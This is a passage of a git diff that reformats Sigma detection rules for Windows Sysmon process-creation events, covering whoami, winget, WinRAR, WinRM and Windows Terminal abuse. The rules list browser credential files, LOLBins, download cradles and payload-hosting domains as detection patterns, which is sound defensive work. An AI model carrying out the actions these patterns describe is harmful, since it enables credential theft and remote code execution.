- - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -49,12 +48,12 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml index 0925cc872..4c7c10545 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml @@ -1,16 +1,10 @@ title: Suspicious Where Execution id: 725a9768-0f5e-4cb3-aec2-bc5719c6831a status: test -description: 'Adversaries may enumerate browser bookmarks to learn more about compromised - hosts. - - Browser bookmarks may reveal personal information about users (ex: banking sites, - interests, social media, etc.) as well as details about - - internal network resources such as servers, tools/dashboards, or other related - infrastructure. - - ' +description: | + Adversaries may enumerate browser bookmarks to learn more about compromised hosts. + Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about + internal network resources such as servers, tools/dashboards, or other related infrastructure. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -28,10 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational where_exe: - - Image|endswith: \where.exe - - OriginalFileName: where.exe + - Image|endswith: \where.exe + - OriginalFileName: where.exe where_opt: - CommandLine|contains: + CommandLine|contains: + # Firefox Data - places.sqlite - cookies.sqlite - formhistory.sqlite @@ -39,6 +34,7 @@ detection: - key4.db - key3.db - sessionstore.jsonlz4 + # Chrome Data - History - Bookmarks - Cookies diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml index d587ffedd..3e6f023fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' -all' - ' /all' condition: process_creation and (all of selection_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml index c8babedd7..6dbee02cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution.yml @@ -1,8 +1,7 @@ title: Whoami Utility Execution id: e28a5a99-da44-436d-b7a0-2afc20a5f413 status: test -description: Detects the execution of whoami, which is often used by attackers after - exploitation / privilege escalation +description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe condition: process_creation and selection falsepositives: - Admin activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml index f201d4390..d02abf7de 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml @@ -1,11 +1,10 @@ title: Whoami.EXE Execution From Privileged Process id: 79ce34ca-af29-4d0e-b832-fc1b377020db related: - - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 - type: obsoletes + - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 + type: obsoletes status: experimental -description: Detects the execution of "whoami.exe" by privileged accounts that are - often abused by threat actors +description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://nsudo.m2team.org/en-us/ @@ -25,8 +24,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: whoami.exe - - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe selection_user: User|contains: - AUTHORI diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml index 975778093..2896db461 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml @@ -1,9 +1,7 @@ title: Group Membership Reconnaissance Via Whoami.EXE id: bd8b828d-0dca-48e1-8a63-8a58ecf2644f status: test -description: Detects the execution of whoami.exe with the /group command line flag - to show group membership for the current user, account type, security identifiers - (SID), and attributes. +description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /groups' - ' -groups' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml index 9bcc505b0..a05fd07e3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_output.yml @@ -1,9 +1,7 @@ title: Whoami.EXE Execution With Output Option id: c30fb093-1109-4dc8-88a8-b30d11c95a5d status: experimental -description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV - as output format or with redirection options to export the results to a file for - later use. +description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -24,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' /FO CSV' - ' -FO CSV' selection_special: - CommandLine|contains: whoami*> + CommandLine|contains: whoami*> condition: process_creation and (all of selection_main_* or selection_special) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml index 79b5e4f83..5383c9ded 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml @@ -22,9 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe filter_main_known_parents: + # This list can be any legitimate shell or application that you expect whoami to run from ParentImage|endswith: - \cmd.exe - \powershell_ise.exe @@ -33,11 +34,10 @@ detection: filter_optional_ms_monitoring_agent: ParentImage|endswith: :\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe filter_main_parent_null: - ParentImage: null + ParentImage: filter_main_parent_empty: ParentImage: '' - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment diff --git a/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml index c902aeace..dee624c11 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml @@ -1,9 +1,7 @@ title: Security Privileges Enumeration Via Whoami.EXE id: 97a80ec7-0e2f-4d05-9ef4-65760e634f6b status: test -description: Detects a whoami.exe executed with the /priv command line flag instructing - the tool to show all current user privileges. This is often used after a privilege - escalation attempt. +description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Florian Roth (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /priv' - ' -priv' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 9be890387..bc5c79ba3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml @@ -1,8 +1,7 @@ title: Suspicious WindowsTerminal Child Processes id: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 status: test -description: Detects suspicious children spawned via the Windows Terminal application - which could be a sign of persistence via WindowsTerminal (see references section) +description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) references: - https://persistence-info.github.io/Data/windowsterminalprofile.html - https://twitter.com/nas_bench/status/1550836225652686848 @@ -25,40 +24,43 @@ detection: - \WindowsTerminal.exe - \wt.exe selection_susp: - - Image|endswith: - - \rundll32.exe - - \regsvr32.exe - - \certutil.exe - - \cscript.exe - - \wscript.exe - - \csc.exe - - Image|contains: - - C:\Users\Public\ - - \Downloads\ - - \Desktop\ - - \AppData\Local\Temp\ - - \Windows\TEMP\ - - CommandLine|contains: - - ' iex ' - - ' icm' - - Invoke- - - 'Import-Module ' - - 'ipmo ' - - DownloadString( - - ' /c ' - - ' /k ' - - ' /r ' + - Image|endswith: + # Add more LOLBINS + - \rundll32.exe + - \regsvr32.exe + - \certutil.exe + - \cscript.exe + - \wscript.exe + - \csc.exe + - Image|contains: + # Add more suspicious paths + - C:\Users\Public\ + - \Downloads\ + - \Desktop\ + - \AppData\Local\Temp\ + - \Windows\TEMP\ + - CommandLine|contains: + # Add more suspicious commandline + - ' iex ' + - ' icm' + - Invoke- + - 'Import-Module ' + - 'ipmo ' + - DownloadString( + - ' /c ' + - ' /k ' + - ' /r ' filter_builtin_visual_studio_shell: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Module - Microsoft.VisualStudio.DevShell.dll - Enter-VsDevShell filter_open_settings: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Packages\Microsoft.WindowsTerminal_ - \LocalState\settings.json filter_vsdevcmd: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Program Files\Microsoft Visual Studio\ - \Common7\Tools\VsDevCmd.bat condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml index 0b40644b6..3296deed7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml @@ -1,10 +1,10 @@ title: Add New Download Source To Winget id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 related: - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental description: Detects usage of winget to add new additional download sources references: @@ -25,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml index 6abf56234..287aa18d5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml @@ -1,17 +1,14 @@ title: Add Insecure Download Source To Winget id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental -description: 'Detects usage of winget to add a new insecure (http) download source. - - Winget will not allow the addition of insecure sources, hence this could indicate - potential suspicious activity (or typos) - - ' +description: | + Detects usage of winget to add a new insecure (http) download source. + Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) references: - https://learn.microsoft.com/en-us/windows/package-manager/winget/source - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget @@ -30,10 +27,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' - http:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml index fb74c505c..5d899caf4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml @@ -1,10 +1,10 @@ title: Add Potential Suspicious New Download Source To Winget id: c15a46a0-07d4-4c87-b4b6-89207835a83b related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar status: experimental description: Detects usage of winget to add new potentially suspicious download sources references: @@ -26,14 +26,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' selection_source_direct_ip: - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + # This is a best effort. A better way to handle this is to limit it via whitelist. Check Group Policy for more details + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml b/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml index cc382340f..93916753a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml @@ -1,15 +1,10 @@ title: Install New Package Via Winget Local Manifest id: 313d6012-51a0-4d93-8dfc-de8553239e25 status: experimental -description: 'Detects usage of winget to install applications via manifest file. Adversaries - can abuse winget to download payloads remotely and execute them. - - The manifest option enables you to install an application by passing in a YAML - file directly to the client. - +description: | + Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. + The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later. - - ' references: - https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install - https://lolbas-project.github.io/lolbas/Binaries/Winget/ @@ -30,19 +25,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \winget.exe - - OriginalFileName: winget.exe + - Image|endswith: \winget.exe + - OriginalFileName: winget.exe selection_install_flag: - CommandLine|contains: + CommandLine|contains: - install - - ' add ' + - ' add ' # https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCLICore/Commands/InstallCommand.h selection_manifest_flag: - CommandLine|contains: + CommandLine|contains: - '-m ' - --manifest condition: process_creation and (all of selection_*) falsepositives: - - Some false positives are expected in some environment that may use this functionality - to install and test their custom applications + - Some false positives are expected in some environment that may use this functionality to install and test their custom applications level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml b/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml index 1d0ce137f..6c2b23539 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml @@ -1,11 +1,10 @@ title: Winrar Compressing Dump Files id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc related: - - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 - type: similar + - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 + type: similar status: experimental -description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" - extension, which could be a step in a process of dump file exfiltration. +description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ author: Florian Roth (Nextron Systems) @@ -23,19 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - Image|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR selection_extension: - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears - accidentally + - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml index fb07c3f61..042866ccc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious Child Process Of WinRAR.EXE id: 146aace8-9bd6-42ba-be7a-0070d8027b76 related: - - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 - type: similar + - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 + type: similar status: experimental description: Detects potentially suspicious child processes of WinRAR.exe. references: @@ -24,24 +24,25 @@ detection: selection_parent: ParentImage|endswith: \WinRAR.exe selection_binaries: - - Image|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - mshta.exe - - PowerShell.EXE - - pwsh.dll - - regsvr32.exe - - RUNDLL32.EXE - - wscript.exe + # Note: add additional binaries that the attacker might use + - Image|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - mshta.exe + - PowerShell.EXE + - pwsh.dll + - regsvr32.exe + - RUNDLL32.EXE + - wscript.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml index 8093169c5..49257549d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml @@ -1,8 +1,7 @@ title: Winrar Execution in Non-Standard Folder id: 4ede543c-e098-43d9-a28f-dd784a13132f status: test -description: Detects a suspicious winrar execution in a folder which is not the default - installation folder +description: Detects a suspicious winrar execution in a folder which is not the default installation folder references: - https://twitter.com/cyb3rops/status/1460978167628406785 author: Florian Roth (Nextron Systems), Tigzy @@ -20,20 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - Image|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR filter_main_unrar: + # Note: we filter unrar as it has the same description as the other utilities, and we're only interested in compression Image|endswith: \UnRAR.exe filter_main_path: Image|contains: - :\Program Files (x86)\WinRAR\ - :\Program Files\WinRAR\ filter_optional_temp: + # Note: in some occasion installers were seen dropping "rar" in TEMP Image|contains: :\Windows\Temp\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate use of WinRAR in a folder of a software that bundles WinRAR level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml index e5c72b660..cfdc3c3b5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml @@ -1,8 +1,7 @@ title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl id: 074e0ded-6ced-4ebd-8b4d-53f55908119d status: test -description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via - winrm.vbs and copied cscript.exe (can be renamed) +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) references: - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 author: Julia Fomina, oscd.community @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational contains_format_pretty_arg: - CommandLine|contains: + CommandLine|contains: - format:pretty - format:"pretty" - format:"text" @@ -30,9 +29,8 @@ detection: - C:\Windows\System32\ - C:\Windows\SysWOW64\ contains_winrm: - CommandLine|contains: winrm - condition: process_creation and (contains_winrm and (contains_format_pretty_arg - and not image_from_system_folder)) + CommandLine|contains: winrm + condition: process_creation and (contains_winrm and (contains_format_pretty_arg and not image_from_system_folder)) falsepositives: - Unlikely level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml index b85b80efc..b105326e2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml @@ -1,8 +1,7 @@ title: Remote Code Execute via Winrm.vbs id: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 status: test -description: Detects an attempt to execute code or create service on remote host via - winrm.vbs. +description: Detects an attempt to execute code or create service on remote host via winrm.vbs. references: - https://twitter.com/bohops/status/994405551751815170 - https://redcanary.com/blog/lateral-movement-winrm-wmi/ @@ -22,10 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cscript.exe - - OriginalFileName: cscript.exe + # Note: winrm.vbs can only be run by a process named cscript (see "IsCScriptEnv" function) + - Image|endswith: \cscript.exe + - OriginalFileName: cscript.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - winrm - invoke Create wmicimv2/Win32_ - -r:http diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml index 1a1738196..0a412dd92 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml @@ -1,9 +1,7 @@ title: Remote PowerShell Session Host Process (WinRM) id: 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 status: test -description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM - host process) as a parent or child process (sign of an active PowerShell remote - session). +description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). references: - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -22,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \wsmprovhost.exe - - ParentImage|endswith: \wsmprovhost.exe + - Image|endswith: \wsmprovhost.exe + - ParentImage|endswith: \wsmprovhost.exe condition: process_creation and selection fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml index f193519c7..76ce12517 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Processes Spawned by WinRM id: 5cc2cda8-f261-4d88-a2de-e9e193c86716 status: test -description: Detects suspicious processes including shells spawnd from WinRM host - process +description: Detects suspicious processes including shells spawnd from WinRM host process author: Andreas Hunkeler (@Karneades), Markus Neis date: 2021/05/20 modified: 2022/07/14 diff --git a/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml index d99b5bd33..cbaf8b9e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml @@ -1,8 +1,7 @@ title: Compress Data and Lock With Password for Exfiltration With WINZIP id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d status: test -description: An adversary may compress or encrypt data that is collected prior to - exfiltration using 3rd party utilities +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: frack113 @@ -20,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_winzip: - CommandLine|contains: + CommandLine|contains: - winzip.exe - winzip64.exe selection_password: - CommandLine|contains: -s" + CommandLine|contains: -s" selection_other: - CommandLine|contains: + CommandLine|contains: - ' -min ' - ' -a ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml b/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml index ae01c9872..9845b0c96 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml @@ -23,7 +23,7 @@ detection: ParentImage|endswith: \EdgeTransport.exe filter_conhost: Image: C:\Windows\System32\conhost.exe - filter_oleconverter: + filter_oleconverter: # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18 Image|startswith: C:\Program Files\Microsoft\Exchange Server\ Image|endswith: \Bin\OleConverter.exe condition: process_creation and (selection and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml b/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml index e8fdee74c..164b5c7f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml +++ 